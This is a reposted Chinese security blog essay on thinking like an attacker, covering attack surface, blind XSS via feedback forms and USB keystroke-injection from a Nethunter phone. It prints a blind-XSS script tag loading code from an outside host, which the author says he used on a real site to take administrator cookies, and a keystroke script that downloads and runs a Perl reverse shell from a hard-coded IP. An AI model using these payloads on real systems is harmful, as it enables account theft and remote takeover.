【黑客淺析】像黑客同樣思考

收錄待用，修改轉載已取得騰訊雲受權

---

網絡安全裏常常說的一句話是未知攻焉知防，基本全部的安全人員也是一名黑客，在黑客攻擊愈發廣泛的今天，如何更好的防護黑客攻擊？用句帶有點哲學的話，成爲黑客，只有成爲黑客，像黑客同樣思考，你才能知道從哪去防護黑客；很俗的一句話，但很實在！

看到了什麼？

看到上圖的第一直覺，你能夠本身想下答案，問問本身看到了什麼？

正常的思惟，第一直觀感覺是中間那個很明顯，很大的黑點，由於這個黑點最吸引你們的注意力，稍微看過一些哲學故事的同窗可能會想到黑點周圍白色的區域，是的，黑點只是其中一個小點，而黑點周圍白色的部分則足夠大；可是，我不知道有沒有人的答案是白色再外面？文章區域再外面？或者整個瀏覽器？整個電腦屏幕？電腦外呢？其實想表達的也正是黑客的思惟裏，永遠不是侷限於能夠看到的部分，而在於可以想到或者沒想到的全部面。

其實這類同於攻擊面！安全是木桶短板原理，木桶能裝多少水不在於最長的那塊板，而是最短的那塊；而一個系統的安全程度不取決於安全作的多全，作的多高大上，而在因而否把那些最簡單的問題處理掉？數據告訴咱們，服務器入侵，除了漏洞以外最大途徑是弱口令，而這就是一個根本沒多少技術含量的方式，屬於安全基線問題，就是一樣的道理。對於黑客而言，攻擊面不會侷限於可以看到的點，而在於全部可能關聯或者沒關聯的面，就好比滲透測試或者說APT，不少時候結合社工這個點可以取得很好的效果，成爲一個絕佳的入侵渠道。因此，第一點，學會放開本身的思惟與想象，發現和關注平時所容易忽略和沒有看到的地方。

什麼是黑客？

什麼是黑客？我用八個字總結，突破創造，守正出奇。在我看來，黑客永遠不是一個貶義詞，黑客自己就是極客，對於黑客來講，這個世界充滿好奇，這個世界有太多的東西能夠探索，特別是網絡的世界。

黑客是一個追求自由的羣體，不喜歡受到條條框框的約束，老是喜歡突破這一切，突破同時也多是一種創造，創造新的方法，新的方式，新的工具，新的東西，就好比上圖，小學課本里的烏鴉喝水，在咱們看來是一種很傻的行爲，但何嘗不是一種穩定傳統的方式？在生活中不少的事不也正如此？或者說就網絡上不少安全的措施有時候也是穩定起見，由於新的東西除了先進，有時候也會帶來風險。而對於黑客來講，可能考慮的更不是這些，而是嘗試，好奇一切。

對於黑客而言，也有本身的黑客精神，有本身要堅持和秉承的東西（地下黑客的原則可能不一樣於正常黑客），這就是守正，自由、共享、平等、互助；在Web安全的世界裏，咱們常常會提到一個詞"猥瑣"，或者說不只限於Web安全，由於不少時候攻擊的產生不是利用一個多厲害的漏洞，而在於猥瑣的思路，幾個定義爲低危的小漏洞的組合也許威力比一個高危漏洞還大，這就取決於漏洞的組合使用，利用思路；這些"猥瑣行爲"就是一種出奇的表現。

瞭解黑客，成爲黑客，才能更好的學會黑客的思考。

看到框就想X

這是一個意見反饋的界面，看到這樣一個界面，你們會怎麼作？對於普通人來講，這就是一個正常的意見提交框，用處就是提交反饋內容；你們想一想黑客會怎麼作？提交攻擊代碼，好比下面的代碼：

</textarea>'"><script src=http://t.cn/R63bUP9></script>

實際上，當時看到這樣一個功能，我就這樣作了。這是360手遊客服中心手機版的一個頁面，能夠提交反饋意見，我當時就直接提交了上面的攻擊代碼，而後就攻擊成功了（這實際上是一次XSS盲打，什麼是XSS盲打你們能夠自行搜索或者看我以前發的文章）。因爲這樣的功能每每看反饋內容的都是系統的相關管理員，因而被攻擊成功的也是管理員，經過XSS盲打能夠直接拿到管理員登陸的帳號的Cookie等信息（下圖就是盲打平臺中收到的攻擊成功返回的後臺地址和管理員Cookie）。

固然，不只限於這個頁面，還有其餘的：

這種行爲總結而言，就是"看到框就想X"，這裏的X也就是XSS的意思；其實這更多的是一種習慣和意識，在黑客的想法裏，看到功能首先想到的不是使用，而是能不能利用，而後因爲攻擊作的多了，看到不一樣的功能和應用頁面，天然就能意識到可能存在的問題，天然而然的就會去測試；常常會有不少人問，那些人在各類SRC提交的漏洞都是怎麼挖的，是否是有神器？可是也不是每一個人的安全測試工具都是神器啊！其實不少時候是在使用中發現漏洞！

不一樣的潛意識行爲和想法，取決於不一樣的知識面和經驗，也取決於不一樣的目的。

功能也是攻擊方式

若是手機沒電了，那麼旁邊若是其餘人正好有電腦，借用其餘人電腦的USB口給手機充電是一件很常見的事，但其實，只是插個數據線，也能夠致使電腦被攻擊，下面視頻演示的是一部手機經過USB鏈接MAC電腦執行指定的命令（視頻裏是ifconfig）。

https://v.qq.com/x/page/q03959yfsxh.html

視頻裏的手機是一個很普通的手機，安裝了一個叫作"Nethunter"的黑客操做系統，也就成爲"黑客手機",裏面集成了一些黑客攻擊工具，好比視頻裏演示的工具叫作DuckHunter HID。看到這個視頻，你們是否會以爲這個攻擊挺高端的，物理黑客攻擊，但當我告訴你們原理以後，你們可能想到的就是"原來如此，這麼簡單"。

手機上顯示的代碼是：

CONTROL SPACE
STRING iterm
ENTERENTER
STRING
ifconfig
ENTER

看完這個代碼不知道你們是否已經明白了攻擊原理，熟悉MAC操做的同窗可能知道CONTROL+SPACE實際上是調起Spotlight，一個相似快捷啓動的工具，而後輸入iterm，就是查找iTerm，而後回車，打開iTerm後，再輸入ifconfig，再回車，就完成了整個命令輸入執行的過程；你們能夠發現，這其實就是一個模擬鍵盤操做的過程，沒錯，上面視頻演示的攻擊原理就是模擬鍵盤操做，其實這時候的手機用USB接入電腦相其實就是把本身設置爲鍵盤接入電腦，而後再直接模擬鍵盤操做進行攻擊。

那麼是否能夠進行危害更大的攻擊？好比反彈Shell？固然能夠，改下代碼便可：

CONTROL SPACE
STRING iterm 
ENTERENTER
STRING wget http://45.32.8.108/b.pl.txt -O /tmp/b.plSTRING perl /tmp/b.pl 
反彈監聽IP 監聽端口
ENTER

採用下載一個Perl腳原本實現反彈Shell，以下面視頻：

https://v.qq.com/x/page/f0395v8ez5e.html

講這個例子的目的其實就是這部分的標題，功能也是攻擊方式。在黑客的眼裏，不是必定得使用漏洞，使用多高端的技巧，能達到攻擊目的和效果的方式都是好的攻擊方式，這些方式不侷限於你們所瞭解的只是漏洞或者暴力破解等，而常常作的就是利用正常的功能來實現攻擊，這種攻擊由於使用的是正常的功能，有時候反而更隱蔽；而相似的攻擊方式，不在少數。

結語

其實，近幾年來，你們對黑客的瞭解已經愈來愈多，黑客也愈來愈失去神祕，而後你們就會發現，他們其實也是生活中的普通人；而在黑夜中工做，有時更多的是由於那時候安靜，作事效率高，或者是管理員不在線好作一些祕密的攻擊和測試等，而不是所謂各類描述裏的戴着衣帽，把本身包裹在黑暗中，不露出本身的真面目等。

其實黑客所不一樣於普通人的點，除了掌握的知識外，就是作事和思考的方式，僅此而已！

---

原文連接：https://www.qcloud.com/community/article/346574